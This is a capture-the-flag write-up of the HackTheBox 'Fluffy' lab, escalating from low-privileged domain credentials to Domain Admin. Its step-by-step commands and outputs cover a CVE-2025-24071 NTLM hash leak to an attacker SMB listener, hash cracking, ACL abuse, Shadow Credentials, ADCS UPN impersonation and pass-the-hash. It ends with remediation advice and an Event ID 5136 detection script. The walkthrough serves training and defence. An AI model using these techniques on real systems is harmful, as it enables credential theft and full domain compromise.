HTB Fluffy: From Low-Priv Creds to Domain Admin via CVE-2025-24071 & Shadow Credentials
Introduction
Fluffy is an Easy-rated Windows box from HackTheBox that simulates a realistic corporate Active Directory environment. The attack chain begins with low-privileged domain credentials and escalates to Domain Admin through a series of techniques: SMB enumeration, an NTLM hash leak via CVE-2025-24071, hash cracking, BloodHound ACL abuse, Shadow Credentials, and ADCS certificate abuse.
Attack Overview
j.fleischman (given credentials)
↓
SMB IT Share (READ/WRITE)
↓
Upgrade_Notice.pdf → CVE-2025-24071 hint
↓
Upload malicious ZIP → Responder catches NTLMv2 hash
↓
Hashcat cracks → p.agila : prometheusx-303
↓
BloodHound: p.agila --GenericAll--> Service Account Managers
↓
bloodyAD: add p.agila to "Service Accounts"
↓
Shadow Credentials on winrm_svc → NT hash
↓
evil-winrm → USER FLAG
↓
BloodHound: winrm_svc --GenericWrite--> ca_svc
↓
pyWhisker: Shadow Credentials on ca_svc → NT hash
↓
UPN manipulation + ADCS certificate request as Administrator
↓
certipy auth → Administrator NT hash
↓
evil-winrm → ROOT FLAG
Setup
Add the following entry to /etc/hosts:
10.129.232.88 hostmaster.fluffy.htb dc01.fluffy.htb fluffy.htb
Set environment variables:
export IP=10.129.232.88
export HOST=fluffy.htb
Initial credentials: j.fleischman / J0elTHEM4n1990!
Reconnaissance (Nmap)
sudo nmap -sC -sV -p- --min-rate 5000 10.129.232.88
Key open ports:
| Port | Service | Significance |
|---|---|---|
| 53 | DNS | Domain Controller |
| 88 | Kerberos | AD authentication |
| 139/445 | SMB | File shares |
| 389/636 | LDAP/LDAPS | AD directory |
| 5985 | WinRM | Remote management |
| 3268/3269 | GC LDAP | Global Catalog |
The presence of Kerberos (88), LDAP (389), SMB (445), and WinRM (5985) confirms this is a Domain Controller.
SMB Enumeration
Listing shares with CrackMapExec:
crackmapexec smb 10.129.232.88 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
Output:
SMB DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB DC01 Share Permissions
SMB DC01 ----- -----------
SMB DC01 ADMIN$
SMB DC01 C$
SMB DC01 IPC$ READ
SMB DC01 IT READ,WRITE
SMB DC01 NETLOGON READ
SMB DC01 SYSVOL READ
The IT share has READ and WRITE access. Browse it using smbclient:
smbclient //10.129.232.88/IT -U 'j.fleischman%J0elTHEM4n1990!'
Contents:
Everything-1.4.1.1026.x64/
Everything-1.4.1.1026.x64.zip
KeePass-2.58/
KeePass-2.58.zip
Upgrade_Notice.pdf
Download and read Upgrade_Notice.pdf:
get Upgrade_Notice.pdf
pdftotext Upgrade_Notice.pdf -
The PDF lists critical unpatched CVEs:
| CVE ID | Severity |
|---|---|
| CVE-2025-24071 | Critical |
| CVE-2025-24996 | Critical |
| CVE-2025-46785 | High |
| CVE-2025-29968 | High |
| CVE-2025-21193 | Medium |
| CVE-2025-3445 | Low |
Exploiting CVE-2025-24071 (NTLM Hash Leak)
CVE-2025-24071 is a critical Windows File Explorer vulnerability. Windows Explorer automatically parses .library-ms files as soon as they are extracted from a ZIP archive. A crafted .library-ms file pointing to an attacker-controlled SMB server causes Explorer to connect to it, leaking the user’s NTLMv2 hash without the user ever opening the file.
A public proof-of-concept script is used to generate the malicious ZIP:
python3 cve.py -f MonFichierTest -i 10.10.14.165
Upload the ZIP to multiple directories in the IT share:
smbclient //10.129.232.88/IT -U 'j.fleischman%J0elTHEM4n1990!'
smb: \> put exploit.zip
smb: \> cd Everything-1.4.1.1026.x64
smb: \Everything-1.4.1.1026.x64\> put exploit.zip
smb: \Everything-1.4.1.1026.x64\> cd ..
smb: \> cd KeePass-2.58
smb: \KeePass-2.58\> put exploit.zip
Start Responder to capture NTLM authentication:
sudo responder -I tun0 -dwv
After a short wait, the hash is captured:
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:033e3464daebc46c:0B85823E9517...
Crack the hash with Hashcat:
echo "p.agila::FLUFFY:033e3464daebc46c:0B85823E9517..." > hash.txt
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Result: prometheusx-303
Credentials obtained: p.agila / prometheusx-303
BloodHound Enumeration & ACL Abuse
Collect BloodHound data:
bloodhound-python -u p.agila -p 'prometheusx-303' -d fluffy.htb -dc dc01.fluffy.htb -c All
BloodHound reveals that p.agila has GenericAll over the Service Account Managers group, and members of that group have write access to members of Service Accounts (including winrm_svc).
Add p.agila to the Service Accounts group using bloodyAD:
bloodyAD -u 'P.AGILA' -p 'prometheusx-303' -d 'fluffy.htb' -H '10.129.232.88' \
add groupMember "SERVICE ACCOUNTS" "P.AGILA"
Output: [+] P.AGILA added to SERVICE ACCOUNTS
Now p.agila has GenericWrite over winrm_svc.
Shadow Credentials Attack on winrm_svc
If you have write access to a user’s msDS-KeyCredentialLink attribute, you can add a public key and authenticate as that user via PKINIT without knowing the password. This is the Shadow Credentials attack.
Use bloodyAD to add shadow credentials for winrm_svc:
bloodyAD -u 'P.AGILA' -p 'prometheusx-303' -d 'fluffy.htb' -H '10.129.232.88' \
add shadowCredentials "WINRM_SVC"
Output:
[+] KeyCredential generated with SHA256: d46db911be4cf6fb...
[+] TGT stored in ccache file winrm_svc_ye.ccache
NT: 33bd09dcd697600edf6b3a7af4875767
Connect via Evil-WinRM using the NT hash:
evil-winrm -i 10.129.232.88 -u 'WINRM_SVC' -H '33bd09dcd697600edf6b3a7af4875767'
Retrieve the user flag:
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
[redacted]
Privilege Escalation to Domain Admin via ADCS
With winrm_svc compromised, BloodHound also shows that winrm_svc has GenericWrite over ca_svc (the certificate authority service account).
Use pywhisker to add shadow credentials for ca_svc:
pywhisker -u "WINRM_SVC" -H "33bd09dcd697600edf6b3a7af4875767" \
-d "fluffy.htb" --dc-ip 10.129.232.88 \
-t "CA_SVC" --action add -f ca_svc
Output:
[+] Updated the msDS-KeyCredentialLink attribute of CA_SVC
[+] Saved PFX certificate at: ca_svc.pfx
[*] Password: 2FLC5ksEYpvBqA5v0vVW
Authenticate as ca_svc to retrieve its NT hash:
certipy auth -pfx ca_svc.pfx -password '2FLC5ksEYpvBqA5v0vVW' \
-dc-ip 10.129.232.88 -username 'CA_SVC' -domain 'fluffy.htb'
Output: [*] Got hash for 'ca_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8
Now abuse ADCS: temporarily change ca_svc’s UPN to Administrator@fluffy.htb (from the winrm_svc shell):
Set-ADUser -Identity "CA_SVC" -UserPrincipalName "Administrator@fluffy.htb"
Request a certificate as Administrator:
certipy req -u 'CA_SVC@fluffy.htb' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' \
-dc-ip 10.129.232.88 -dc-host dc01.fluffy.htb -target 10.129.232.88 \
-ca 'fluffy-DC01-CA' -template 'User'
Output:
[*] Got certificate with UPN 'Administrator@fluffy.htb'
[*] Saved certificate to 'administrator.pfx'
Restore the original UPN:
Set-ADUser -Identity "CA_SVC" -UserPrincipalName "CA_SVC@fluffy.htb"
Authenticate as Administrator using the forged certificate:
certipy auth -pfx administrator.pfx -dc-ip 10.129.232.88
Output: [*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
Connect as Domain Admin:
evil-winrm -i 10.129.232.88 -u 'Administrator' -H '8da83a3fa618b6e3a00e93f676c92a6e'
Retrieve the root flag:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[redacted]
Key Takeaways
| Vulnerability | Root Cause | Remediation |
|---|---|---|
| CVE-2025-24071 (NTLM leak via .library-ms) | Windows Explorer automatically parses library files upon extraction | Apply March 2025 Patch Tuesday updates; block outbound SMB on firewalls |
| GenericAll ACL abuse | Overly permissive ACE allowing group membership modification | Regularly audit ACLs using BloodHound CE; enforce least privilege |
| Shadow Credentials | Write access to msDS-KeyCredentialLink attribute enables account takeover | Monitor Event ID 5136 for attribute changes; alert on unexpected modifications |
| ADCS UPN manipulation | Certificate template allows requestor to set UPN in SAN | Review certificate templates; restrict enrollment rights; disable UPN-based SAN if not required |
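To make the monitoring advice in the table concrete, here is an added detection example (not part of the original write-up and not code from any of the tools listed below). It scans Windows Security Event ID 5136 (Directory Service Changes) records, exported as JSON lines, for the three directory writes this chain leaves on the DC: a member added to a sensitive group (the bloodyAD step), a key written to msDS-KeyCredentialLink (both Shadow Credentials steps), and a service account's userPrincipalName rewritten to another principal's name (the ADCS step). The sample events, the SENSITIVE_GROUPS list and the key-credential blob are constructed for this example; field names follow the 5136 event XML.

```python
"""Flag the directory changes this attack chain produces, from Event ID 5136 records.

Sample events are constructed, not taken from the box; field names follow the
5136 event data (ObjectDN, AttributeLDAPDisplayName, AttributeValue,
OperationType, SubjectUserName).
"""
import json

# OperationType codes as written in 5136 event data.
VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"

# Groups whose membership changes should always be reviewed (constructed list).
SENSITIVE_GROUPS = {"cn=service accounts,cn=users,dc=fluffy,dc=htb"}


def leading_cn(dn: str) -> str:
    """Value of the first RDN of a DN, lower-cased ('CN=ca_svc,...' -> 'ca_svc')."""
    first = dn.split(",", 1)[0]
    return (first.split("=", 1)[1] if "=" in first else first).strip().lower()


def analyse_event(event: dict):
    """Return an alert dict if a 5136 event matches one of the patterns, else None."""
    if event.get("EventID") != 5136 or event.get("OperationType") != VALUE_ADDED:
        return None  # only value additions matter; deletions are the attacker's cleanup
    attr = event.get("AttributeLDAPDisplayName", "")
    obj = event.get("ObjectDN", "")
    value = event.get("AttributeValue", "")
    actor = event.get("SubjectUserName", "")

    if attr == "msDS-KeyCredentialLink":
        reason = "Shadow Credentials: key credential added to msDS-KeyCredentialLink"
    elif attr == "userPrincipalName":
        # The user part of the new UPN no longer matches the account's own name:
        # the change that precedes an ADCS certificate request as someone else.
        if value.split("@", 1)[0].lower() == leading_cn(obj):
            return None
        reason = f"UPN rewritten to {value}: possible ADCS impersonation"
    elif attr == "member":
        if obj.lower() not in SENSITIVE_GROUPS:
            return None
        reason = f"{leading_cn(value)} added to sensitive group {leading_cn(obj)}"
    else:
        return None
    return {"object": leading_cn(obj), "attribute": attr, "actor": actor, "reason": reason}


def scan(lines):
    """Run analyse_event over JSON-lines input and return the list of alerts."""
    alerts = []
    for line in lines:
        if line.strip():
            alert = analyse_event(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample: the sequence an attacker following this write-up produces
# (group add, key credential add, UPN swap and restore), plus two benign changes.
SAMPLE_LOG = """
{"EventID": 5136, "SubjectUserName": "p.agila", "ObjectDN": "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb", "AttributeLDAPDisplayName": "member", "AttributeValue": "CN=p.agila,CN=Users,DC=fluffy,DC=htb", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "p.agila", "ObjectDN": "CN=winrm_svc,CN=Users,DC=fluffy,DC=htb", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "AttributeValue": "B:828:CONSTRUCTED-KEYCREDENTIAL-BLOB", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "winrm_svc", "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb", "AttributeLDAPDisplayName": "userPrincipalName", "AttributeValue": "CA_SVC@fluffy.htb", "OperationType": "%%14675"}
{"EventID": 5136, "SubjectUserName": "winrm_svc", "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb", "AttributeLDAPDisplayName": "userPrincipalName", "AttributeValue": "Administrator@fluffy.htb", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "winrm_svc", "ObjectDN": "CN=ca_svc,CN=Users,DC=fluffy,DC=htb", "AttributeLDAPDisplayName": "userPrincipalName", "AttributeValue": "CA_SVC@fluffy.htb", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "helpdesk", "ObjectDN": "CN=j.fleischman,CN=Users,DC=fluffy,DC=htb", "AttributeLDAPDisplayName": "description", "AttributeValue": "IT staff", "OperationType": "%%14674"}
{"EventID": 5136, "SubjectUserName": "helpdesk", "ObjectDN": "CN=Marketing,CN=Users,DC=fluffy,DC=htb", "AttributeLDAPDisplayName": "member", "AttributeValue": "CN=j.fleischman,CN=Users,DC=fluffy,DC=htb", "OperationType": "%%14674"}
"""


def run_sample():
    """Scan the constructed log; returns the three expected alerts."""
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(f"[ALERT] {a['actor']} -> {a['object']} ({a['attribute']}): {a['reason']}")
```

Two points worth noting when deploying this on real data: 5136 is only generated when the "Audit Directory Service Changes" subcategory is enabled and the objects carry a SACL covering the write, so the service accounts and groups of interest must be explicitly audited; and a UPN "replace" shows up as a delete followed by an add, which is why the scanner keys on the added value and ignores the restore (whose user part matches the account's own CN).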
Resources
- Nmap — Network discovery and port scanning
- CrackMapExec — Post-exploitation tool for AD environments
- Responder — LLMNR/NBT-NS/mDNS poisoner and NTLM hash catcher
- Hashcat — Advanced password recovery
- BloodHound — Active directory privilege escalation path mapping
- bloodyAD — Active Directory privilege escalation framework
- pywhisker — Shadow Credentials attack tool
- certipy — Active Directory Certificate Services enumeration and abuse
- evil-winrm — WinRM shell for penetration testing